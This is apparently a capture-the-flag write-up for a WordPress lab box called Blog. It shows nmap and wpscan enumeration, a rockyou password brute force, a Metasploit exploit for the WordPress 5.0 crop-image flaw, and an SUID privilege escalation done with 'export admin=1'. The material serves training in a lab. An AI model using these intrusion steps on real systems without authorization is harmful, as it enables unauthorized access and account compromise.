# Write-up

### <mark style="color:purple;">Objectives</mark>

Enumerate this box and find the 2 flags that are hiding on it! Billy has some weird things going on his laptop. Can you maneuver around and get what you need? Or will you fall down the rabbit hole...

***

### <mark style="color:purple;">Reconnaissance</mark>

First, we perform a port scan using **Nmap** to identify open services on the target machine.

```bash
sudo nmap -Pn -sCV -F -T5 <ip_victim>
```

The result shows the following open ports:

* **22** (SSH)
* **80** (HTTP)
* **139** (NetBIOS)
* **445** (SMB)

When visiting port 80, we discover that the website is running **WordPress**. Upon clicking any link, we are redirected to **blog.thm**, which means we need to add it to our **/etc/hosts** file to continue.

#### **User Enumeration:**

We identify two potential users:

* **Karen Wheeler** (username: **kwheel**)
* **Billy Joel** (username: **bjoel**)

To confirm the existence of these users and look for any other potential accounts, we use **wpscan**:

```bash
wpscan --url http://blog.thm/ --enumerate u
```

This confirms that only the two users are present.

***

### <mark style="color:purple;">Gaining a Shell</mark>

Next, we attempt to gain access to the WordPress admin panel by brute-forcing the credentials of the users. We use **wpscan** with the **rockyou.txt** wordlist:

```bash
wpscan --url http://blog.thm/ --usernames kwheel,bjoel --passwords /usr/share/wordlists/rockyou.txt
```

After approximately 17 minutes, we successfully crack **kwheel**'s password.

#### **WordPress Exploit (Version 5.0):**

Once inside the admin panel, we confirm that the WordPress version is **5.0**. Searching for vulnerabilities on **Exploit-DB**, we find an exploit targeting the **Crop-image** feature in WordPress 5.0.

The exploit suggests using **Metasploit**:

```bash
msfconsole
```

We configure the exploit with the correct parameters (RHOSTS, LHOST, RPORT, LPORT, PASSWORD, and USERNAME) and run it to gain a shell.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXc4yJhgHoMWH12Nf8pub-anyAnc_BQQ01cBMYt9x8FpzRLKls3d-5JzZ3A7e05ogcIM8R8Ekb7NpsfcizM5osCJKuX-iH6P_od8vdK1-dpBGPiq6zAB5lbD1g4A-U9mn7Vp2xLl_Q?key=hO0pUMf6FTRt0AX1m_Ki4hWP" alt=""><figcaption></figcaption></figure>

#### **Reverse Shell:**

Once we have access to the system, we improve our shell's interactivity with the following command:

```bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

***

### <mark style="color:purple;">Privilege Escalation</mark>

#### **Searching for user.txt:**

We perform a search for the **user.txt** file:

```bash
find / -type f -name "user.txt" 2>/dev/null
```

At this point, we realize we need to escalate privileges to access this file.

#### **SUID Search:**

We search for files with the **SUID** bit set:

```bash
find / -type f -perm -04000 -ls 2>/dev/null
```

We find a file named **checker**. When executed, it returns the message **"Not an Admin"**. After inspecting it with **ltrace**, we see that it checks the **admin** variable but receives **nil**.

We modify the **admin** variable using **export**:

```bash
export admin="1"
```

This allows us to bypass the check and run the script as **root**.

#### **Finding the Flags:**

Once we have root privileges, we search for **user.txt** again and find it in a different location. We also obtain **root.txt**, completing the machine.